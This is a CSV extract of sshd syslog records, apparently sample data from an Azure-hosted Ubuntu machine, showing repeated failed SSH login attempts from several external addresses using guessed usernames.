+3690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:13:16,UbuntuDevEnv,2019-06-26 13:13:16,auth,UbuntuDevEnv,info,Invalid user fsp from 194.228.3.191 port 53218,121961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fsp,194.228.3.1,53218,,
+3691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:13:16,UbuntuDevEnv,2019-06-26 13:13:16,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,121961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:13:16,UbuntuDevEnv,2019-06-26 13:13:16,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:13:18,UbuntuDevEnv,2019-06-26 13:13:18,auth,UbuntuDevEnv,info,Failed password for invalid user fsp from 194.228.3.191 port 53218 ssh2,121961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fsp,194.228.3.1,53218,,
+3694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:13:18,UbuntuDevEnv,2019-06-26 13:13:18,auth,UbuntuDevEnv,info,Disconnected from invalid user fsp 194.228.3.191 port 53218 [preauth],121961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fsp,194.228.3.1,53218,,
+3695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:13:18,UbuntuDevEnv,2019-06-26 13:13:18,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 53218:11: Bye Bye [preauth],121961,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,53218,,
+3696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:01,UbuntuDevEnv,2019-06-26 13:14:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112  user=test,122100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,139.199.34.1,,0,
+3697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:02,UbuntuDevEnv,2019-06-26 13:14:02,auth,UbuntuDevEnv,info,Failed password for test from 139.199.34.112 port 56902 ssh2,122100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,56902,,
+3698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:04,UbuntuDevEnv,2019-06-26 13:14:04,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 139.199.34.112 port 56902 [preauth],122100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,139.199.34.1,56902,,
+3699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:04,UbuntuDevEnv,2019-06-26 13:14:04,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 56902:11: Bye Bye [preauth],122100,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,56902,,
+3700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:20,UbuntuDevEnv,2019-06-26 13:14:19,auth,UbuntuDevEnv,info,Invalid user xie from 201.48.54.81 port 39662,122184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xie,201.48.54.8,39662,,
+3701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:20,UbuntuDevEnv,2019-06-26 13:14:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,122184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:20,UbuntuDevEnv,2019-06-26 13:14:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,122184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:22,UbuntuDevEnv,2019-06-26 13:14:21,auth,UbuntuDevEnv,info,Failed password for invalid user xie from 201.48.54.81 port 39662 ssh2,122184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xie,201.48.54.8,39662,,
+3704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:22,UbuntuDevEnv,2019-06-26 13:14:21,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 39662:11: Bye Bye [preauth],122184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,39662,,
+3705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:22,UbuntuDevEnv,2019-06-26 13:14:21,auth,UbuntuDevEnv,info,Disconnected from invalid user xie 201.48.54.81 port 39662 [preauth],122184,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xie,201.48.54.8,39662,,
+3706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:26,UbuntuDevEnv,2019-06-26 13:14:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27  user=root,122210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,157.230.115.2,,0,
+3707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:28,UbuntuDevEnv,2019-06-26 13:14:28,auth,UbuntuDevEnv,info,Failed password for root from 157.230.115.27 port 39084 ssh2,122210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,39084,,
+3708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:28,UbuntuDevEnv,2019-06-26 13:14:28,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 39084:11: Bye Bye [preauth],122210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,39084,,
+3709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:28,UbuntuDevEnv,2019-06-26 13:14:28,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 157.230.115.27 port 39084 [preauth],122210,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,157.230.115.2,39084,,
+3710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:45,UbuntuDevEnv,2019-06-26 13:14:44,auth,UbuntuDevEnv,info,Invalid user shun from 194.228.3.191 port 33502,122277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shun,194.228.3.1,33502,,
+3711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:45,UbuntuDevEnv,2019-06-26 13:14:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,122277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:45,UbuntuDevEnv,2019-06-26 13:14:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,122277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:47,UbuntuDevEnv,2019-06-26 13:14:46,auth,UbuntuDevEnv,info,Failed password for invalid user shun from 194.228.3.191 port 33502 ssh2,122277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shun,194.228.3.1,33502,,
+3714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:47,UbuntuDevEnv,2019-06-26 13:14:46,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 33502:11: Bye Bye [preauth],122277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,33502,,
+3715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:14:47,UbuntuDevEnv,2019-06-26 13:14:46,auth,UbuntuDevEnv,info,Disconnected from invalid user shun 194.228.3.191 port 33502 [preauth],122277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shun,194.228.3.1,33502,,
+3716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:11,UbuntuDevEnv,2019-06-26 13:16:11,auth,UbuntuDevEnv,info,Invalid user fahmed from 201.48.54.81 port 48062,122675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fahmed,201.48.54.8,48062,,
+3717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:11,UbuntuDevEnv,2019-06-26 13:16:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,122675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:11,UbuntuDevEnv,2019-06-26 13:16:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,122675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:12,UbuntuDevEnv,2019-06-26 13:16:12,auth,UbuntuDevEnv,info,Invalid user admin from 139.199.34.112 port 44464,122664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,139.199.34.1,44464,,
+3720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:12,UbuntuDevEnv,2019-06-26 13:16:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,122664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:12,UbuntuDevEnv,2019-06-26 13:16:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,122664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:13,UbuntuDevEnv,2019-06-26 13:16:13,auth,UbuntuDevEnv,info,Failed password for invalid user fahmed from 201.48.54.81 port 48062 ssh2,122675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fahmed,201.48.54.8,48062,,
+3723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:13,UbuntuDevEnv,2019-06-26 13:16:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191  user=test,122683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,194.228.3.1,,0,
+3724,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:14,UbuntuDevEnv,2019-06-26 13:16:13,auth,UbuntuDevEnv,info,Disconnected from invalid user fahmed 201.48.54.81 port 48062 [preauth],122675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fahmed,201.48.54.8,48062,,
+3725,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:14,UbuntuDevEnv,2019-06-26 13:16:13,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 48062:11: Bye Bye [preauth],122675,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,48062,,
+3726,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:14,UbuntuDevEnv,2019-06-26 13:16:14,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 139.199.34.112 port 44464 ssh2,122664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,139.199.34.1,44464,,
+3727,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:15,UbuntuDevEnv,2019-06-26 13:16:14,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 139.199.34.112 port 44464 [preauth],122664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,139.199.34.1,44464,,
+3728,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:15,UbuntuDevEnv,2019-06-26 13:16:14,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 44464:11: Bye Bye [preauth],122664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,44464,,
+3729,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:16,UbuntuDevEnv,2019-06-26 13:16:15,auth,UbuntuDevEnv,info,Failed password for test from 194.228.3.191 port 42019 ssh2,122683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,42019,,
+3730,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:16,UbuntuDevEnv,2019-06-26 13:16:15,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 42019:11: Bye Bye [preauth],122683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,42019,,
+3731,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:16,UbuntuDevEnv,2019-06-26 13:16:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 194.228.3.191 port 42019 [preauth],122683,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,194.228.3.1,42019,,
+3732,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:21,UbuntuDevEnv,2019-06-26 13:16:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,122714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3733,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:21,UbuntuDevEnv,2019-06-26 13:16:20,auth,UbuntuDevEnv,info,Invalid user david from 157.230.115.27 port 56448,122714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,157.230.115.2,56448,,
+3734,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:21,UbuntuDevEnv,2019-06-26 13:16:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,122714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3735,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:23,UbuntuDevEnv,2019-06-26 13:16:23,auth,UbuntuDevEnv,info,Failed password for invalid user david from 157.230.115.27 port 56448 ssh2,122714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,157.230.115.2,56448,,
+3736,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:23,UbuntuDevEnv,2019-06-26 13:16:23,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 56448:11: Bye Bye [preauth],122714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,56448,,
+3737,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:16:23,UbuntuDevEnv,2019-06-26 13:16:23,auth,UbuntuDevEnv,info,Disconnected from invalid user david 157.230.115.27 port 56448 [preauth],122714,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,david,157.230.115.2,56448,,
+3738,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:17:48,UbuntuDevEnv,2019-06-26 13:17:47,auth,UbuntuDevEnv,info,Invalid user l4d2 from 194.228.3.191 port 50542,123020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,l4d2,194.228.3.1,50542,,
+3739,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:17:48,UbuntuDevEnv,2019-06-26 13:17:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,123020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3740,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:17:48,UbuntuDevEnv,2019-06-26 13:17:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,123020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3741,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:17:50,UbuntuDevEnv,2019-06-26 13:17:49,auth,UbuntuDevEnv,info,Failed password for invalid user l4d2 from 194.228.3.191 port 50542 ssh2,123020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,l4d2,194.228.3.1,50542,,
+3742,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:17:50,UbuntuDevEnv,2019-06-26 13:17:49,auth,UbuntuDevEnv,info,Disconnected from invalid user l4d2 194.228.3.191 port 50542 [preauth],123020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,l4d2,194.228.3.1,50542,,
+3743,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:17:50,UbuntuDevEnv,2019-06-26 13:17:49,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 50542:11: Bye Bye [preauth],123020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,50542,,
+3744,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:14,UbuntuDevEnv,2019-06-26 13:18:13,auth,UbuntuDevEnv,info,Invalid user francine from 157.230.115.27 port 45576,123109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francine,157.230.115.2,45576,,
+3745,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:14,UbuntuDevEnv,2019-06-26 13:18:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,123109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3746,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:14,UbuntuDevEnv,2019-06-26 13:18:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,123109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3747,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:16,UbuntuDevEnv,2019-06-26 13:18:16,auth,UbuntuDevEnv,info,Failed password for invalid user francine from 157.230.115.27 port 45576 ssh2,123109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francine,157.230.115.2,45576,,
+3748,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:16,UbuntuDevEnv,2019-06-26 13:18:16,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 45576:11: Bye Bye [preauth],123109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,45576,,
+3749,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:18:16,UbuntuDevEnv,2019-06-26 13:18:16,auth,UbuntuDevEnv,info,Disconnected from invalid user francine 157.230.115.27 port 45576 [preauth],123109,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,francine,157.230.115.2,45576,,
